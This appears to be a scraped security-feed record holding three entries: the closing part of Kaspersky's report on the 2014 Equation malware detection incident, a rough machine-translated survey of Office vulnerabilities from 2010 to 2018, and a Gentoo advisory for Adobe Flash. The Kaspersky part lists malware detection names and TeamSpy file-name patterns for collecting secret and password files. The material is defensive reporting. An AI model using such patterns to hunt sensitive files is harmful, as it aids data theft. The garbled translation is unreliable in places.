\nnot-a-virus:AdWare.Win32.Agent.allm \nnot-a-virus:AdWare.Win32.AirAdInstaller.cdgd \nnot-a-virus:AdWare.Win32.AirAdInstaller.emlr \nnot-a-virus:AdWare.Win32.Amonetize.fay \nnot-a-virus:AdWare.Win32.DomaIQ.cjw \nnot-a-virus:AdWare.Win32.Fiseria.t \nnot-a-virus:AdWare.Win32.iBryte.jda \nnot-a-virus:AdWare.Win32.Inffinity.yas \nnot-a-virus:AdWare.Win32.MultiPlug.nbjr \nnot-a-virus:AdWare.Win32.Shopper.adw \nnot-a-virus:Downloader.NSIS.Agent.am \nnot-a-virus:Downloader.NSIS.Agent.an \nnot-a-virus:Downloader.NSIS.Agent.as \nnot-a-virus:Downloader.NSIS.Agent.go \nnot-a-virus:Downloader.NSIS.Agent.lf \nnot-a-virus:Downloader.NSIS.OutBrowse.a \nnot-a-virus:Downloader.Win32.Agent.bxib \nnot-a-virus:Monitor.Win32.Hooker.br \nnot-a-virus:Monitor.Win32.KeyLogger.xh \nnot-a-virus:PSWTool.Win32.Cain.bp \nnot-a-virus:PSWTool.Win32.Cain.bq \nnot-a-virus:PSWTool.Win32.CredDump.a \nnot-a-virus:PSWTool.Win32.FirePass.ia \nnot-a-virus:PSWTool.Win32.NetPass.amv \nnot-a-virus:PSWTool.Win32.PWDump.3 \nnot-a-virus:PSWTool.Win32.PWDump.4 \nnot-a-virus:PSWTool.Win32.PWDump.5 \nnot-a-virus:PSWTool.Win32.PWDump.ar \nnot-a-virus:PSWTool.Win32.PWDump.at \nnot-a-virus:PSWTool.Win32.PWDump.bey \nnot-a-virus:PSWTool.Win32.PWDump.bkr \nnot-a-virus:PSWTool.Win32.PWDump.bve \nnot-a-virus:PSWTool.Win32.PWDump.f \nnot-a-virus:PSWTool.Win32.PWDump.sa \nnot-a-virus:PSWTool.Win32.PWDump.yx \nnot-a-virus:RiskTool.Win32.WinCred.gen \nnot-a-virus:RiskTool.Win64.WinCred.a \nnot-a-virus:WebToolbar.JS.Condonit.a \nnot-a-virus:WebToolbar.Win32.Agent.avl \nnot-a-virus:WebToolbar.Win32.Cossder.updv \nnot-a-virus:WebToolbar.Win32.Cossder.uubg \nnot-a-virus:WebToolbar.Win32.MyWebSearch.sv \nPDM:Trojan.Win32.Badur.a \nTrojan-Banker.Win32.Agent.kan \nTrojan-Downloader.Win32.Genome.jlcv \nTrojan-Dropper.Win32.Injector.jqmj \nTrojan-Dropper.Win32.Injector.ktep \nTrojan-FakeAV.Win64.Agent.j \nTrojan-Ransom.Win32.ZedoPoo.phd \nTrojan.Java.Agent.at \nTrojan.Win32.Adond.lbgp \nTrojan.Win32.Buzus.umzt \nTrojan.Win32.Buzus.uuzf \nTrojan.Win32.Diple.fygv \nTrojan.Win32.Genome.amqoa \nTrojan.Win32.Genome.amtor \nTrojan.Win32.Genome.kpzv \nTrojan.Win32.Genome.ngd \nTrojan.Win32.Inject.euxi \nTrojan.Win32.Starter.ceg \nTrojan.Win32.Swisyn.aaig \nUDS:DangerousObject.Multi.Generic \nUFO:(blocked) \nVirTool.Win32.Rootkit \nVirTool.Win32.Topo.12 \nVirus.Win32.Suspic.gen \nWMUF:(blocked)\n\n## Conclusions\n\nAt this point, we had the answers to the questions we felt could be answered. To summarize, we will address each one below:\n\n**Q1** - Was our software used outside of its intended functionality to pull classified information from a person's computer?\n\n**A1** - The software performed as expected and notified our analysts of alerts on signatures written to detect on Equation group malware that was actively under investigation. In no way was the software used outside of this scope to either pull back additional files that did not fire on a malware signature or were not part of the archive that fired on these signatures.\n\n**Q2** - When did this incident occur?\n\n**A2** - In our professional opinion, the incident spanned between September 11, 2014 and November 17, 2014.\n\n**Q3** - Who was this person?\n\n**A3** - Because our software anonymizes certain aspects of users' information, we are unable to pinpoint specifically who the user was. Even if we could, disclosing such information is against our policies and ethical standards. What we can determine is that the user was originating from an IP address that is supposedly assigned to a Verizon FiOS address pool for the Baltimore, MD and surrounding area.\n\n**Q4** - Was there actually classified information found on the system inadvertently?\n\n**A4** - What is believed to be potentially classified information was pulled back because it was contained within an archive that fired on an Equation specific malware signatures. Besides malware, the archive also contained what appeared to be source code for Equation malware and four Word documents bearing classification markings.\n\n**Q5** - If classified information was pulled back, what happened to said data after? Was it handled appropriately?\n\n**A5** - After discovering the suspected Equation malware source code and classified documents, the analyst reported the incident to the CEO. Following a request from the CEO, the archive was deleted from all of our systems. With the archive that contained the classified information being subsequently removed from our storage locations, only traces of its detection remain in our system (i.e. \u2013 statistics and some metadata). We cannot assess whether the data was \"handled appropriately\" (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so.\n\n**Q6 \u2013 **Why was the data pulled back in the first place? Is the evidence this information was passed on to \"Russian Hackers\" or Russian intelligence?\n\n**A6 - **The information was pulled back because the archive fired on multiple Equation malware signatures. We also found no indication the information ever left our corporate networks. Transfer of a malware file is done with appropriate encryption level relying on RSA+AES with an acceptable key length, which should exclude attempts to intercept such data anywhere on the network between our security software and the analyst receiving the file.\n\n**Q7** - What types of files were gathered from the supposed system?\n\n**A7** - Based on statistics, the files that were submitted to Kaspersky Lab were mostly malware samples and suspected malicious files, either stand-alone, or inside a 7zip archive. The only files stored to date still in our sample collection from this incident are malicious binaries.\n\n**Q8** - Do we have any indication the user was subsequently \"hacked\" by Russian actors and data exfiltrated?\n\n**A8** - Based on the detections and alerts found in the investigation, the system was most likely compromised during this time frame by unknown threat actors. We asses this from the fact that the user installed a backdoored MS Office 2013 illegal activation tool, detected by our products as Backdoor.Win32.Mokes.hvl. To run this malware, the user must have disabled the AV protection, since running it with the antivirus enabled would not have been possible. This malicious software is a Trojan (later identified as \"Smoke Bot\" or \"Smoke Loader\") allegedly created by a Russian hacker in 2011 and made available on [Russian underground forums](<http://xaker.name/threads/22008/>) for purchase. During the period of September 2014-November 2014, the command and control servers of this malware were registered to presumably a Chinese entity going by the name \"Zhou Lou\", from Hunan, using the e-mail address \"zhoulu823@gmail.com\". We are still working on this and further details on this malware might be made available later as a separate research paper.\n\nOf course, the possibility exists that there may have been other malware on the system which our engines did not detect at the time of research. Given that system owner's potential clearance level, the user could have been a prime target of nation states. Adding the user's apparent need for cracked versions of Windows and Office, poor security practices, and improper handling of what appeared to be classified materials, it is possible that the user could have leaked information to many hands. What we are certain about is that any non-malware data that we received based on passive consent of the user was deleted from our storage.\n\n**Q9** - Could Kaspersky Lab products be secretly used to intentionally siphon sensitive data unrelated to malware from customers' computers?\n\n**A9** - Kaspersky Lab security software, like all other similar solutions from our competitors, has privileged access to computer systems to be able to resist serious malware infections and return control of the infected system back to the user. This level of access allows our software to see any file on the systems that we protect. With great access comes great responsibility and that is why a procedure to create a signature that would request a file from a user's computer has to be carefully handled. Kaspersky malware analysts have rights to create signatures. Once created, these signatures are reviewed and committed by another group within Kaspersky Lab to ensure proper checks and balances. If there were an external attempt to create a signature, that creation would be visible not only in internal databases and historical records, but also via external monitoring of all our released signatures by third parties. Considering that our signatures are regularly reversed by other researchers, competitors, and offensive research companies, if any morally questionable signatures ever existed it would have already been discovered. Our internal analysis and searching revealed no such signatures as well.\n\nIn relation to Equation research specifically, our checks verified that during 2014-2016, none of the researchers working on Equation possessed the rights to commit signatures directly without having an experienced signature developer verifying those. If there was a doubtful intention in signatures during the hunt for Equation samples, this would have been questioned and reported by a lead signature developer.\n\n**Q10** - Assuming cyberspies were able to see screens of our analysts, what could they find on it and how could that be interpreted?\n\n**A10** - We have done a thorough search for keywords and classification markings in our signature databases. The result was negative: we never created any signatures on known classification markings. However, during this sweep we discovered something interesting in relation to TeamSpy research that we published earlier (for more details we recommend to check the original research at https://securelist.com/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/35520/). TeamSpy malware was designed to automatically collect certain files that fell into the interest of the attackers. They defined a list of file extensions, such as office documents (*.doc, *.rtf, *.xls, *.mdb), pdf files (*.pdf) and more. In addition, they used wildcard string pattern based on keywords in the file names, such as *pass*, *secret*, *saidumlo* (meaning \"secret\" in Georgian) and others. These patterns were hardcoded into the malware that we discovered earlier, and could be used to detect similar malware samples. We did discover a signature created by a malware analyst in 2015 that was looking for the following patterns:\n\n * *saidumlo*\n * *secret*.*\n * *.xls\n * *.pdf\n * *.pgp\n * *pass*.*\n\nThese strings had to be located in the body of the malware dump from a sandbox processed sample. In addition, the malware analyst included another indicator to avoid false positives; A path where the malware dropper stored dropped files: ProgramData\\Adobe\\AdobeARM.\n\nOne could theorize about an intelligence operator monitoring a malware analyst's work in the process of entering these strings during the creation of a signature. We cannot say for sure, but it is a possibility that an attacker looking for anything that can expose our company from a negative side, observations like this may work as a trigger for a biased mind. Despite the intentions of the malware analyst, they could have been interpreted wrongly and used to create false allegations against us, supported by screenshots displaying these or similar strings.\n\nMany people including security researchers, governments, and even our direct competitors from the private sector have approached us to express support. It is appalling to see that accusations against our company continue to appear without any proof or factual information being presented. Rumors, anonymous sources, and lack of hard evidence spreads only fear, uncertainty and doubt. We hope that this report sheds some long-overdue light to the public and allows people to draw their own conclusions based on the facts presented above. We are also open and willing to do more, should that be required.\n\n[![](https://securelist.com/files/2012/08/pdf_small5.gif) **Appendix: Analysis of the Mokes/SmokeBot backdoor from the incident](<https://securelist.com/files/2017/11/Appendix_Mokes-SmokeBot_analysis.pdf>)", "modified": "2017-11-16T10:00:34", "published": "2017-11-16T10:00:34", "href": "https://securelist.com/investigation-report-for-the-september-2014-equation-malware-detection-incident-in-the-us/83210/", "id": "SECURELIST:FA58963C07F2F288FA3096096F60BCF3", "type": "securelist", "title": "Investigation Report for the September 2014 Equation malware detection incident in the US", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:22", "bulletinFamily": "info", "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:02", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2428", "CVE-2011-2444", "CVE-2011-2416", "CVE-2011-0622", "CVE-2011-0626", "CVE-2011-0627", "CVE-2011-0619", "CVE-2011-2140", "CVE-2011-0623", "CVE-2011-0609", "CVE-2011-2424", "CVE-2011-0625", "CVE-2011-2134", "CVE-2011-2138", "CVE-2011-0628", "CVE-2011-2139", "CVE-2011-0572", "CVE-2011-0573", "CVE-2011-2429", "CVE-2011-0558", "CVE-2011-0608", "CVE-2011-0574", "CVE-2011-2425", "CVE-2011-2110", "CVE-2011-0560", "CVE-2011-0577", "CVE-2011-2414", "CVE-2011-0611", "CVE-2011-0618", "CVE-2011-0561", "CVE-2011-2130", "CVE-2011-2137", "CVE-2011-0578", "CVE-2011-2417", "CVE-2011-2135", "CVE-2011-0579", "CVE-2011-2125", "CVE-2011-0571", "CVE-2011-2426", "CVE-2011-0575", "CVE-2011-2107", "CVE-2011-0559", "CVE-2011-2136", "CVE-2011-0624", "CVE-2011-0607", "CVE-2011-2415", "CVE-2011-0589", "CVE-2011-0621", "CVE-2011-2427", "CVE-2011-2430", "CVE-2011-0620"], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers and Adobe Security Advisories and Bulletins referenced below for details. \n\n### Impact\n\nBy enticing a user to open a specially crafted SWF file a remote attacker could cause a Denial of Service or the execution of arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-10.3.183.10\"", "edition": 1, "modified": "2011-10-13T00:00:00", "published": "2011-10-13T00:00:00", "id": "GLSA-201110-11", "href": "https://security.gentoo.org/glsa/201110-11", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}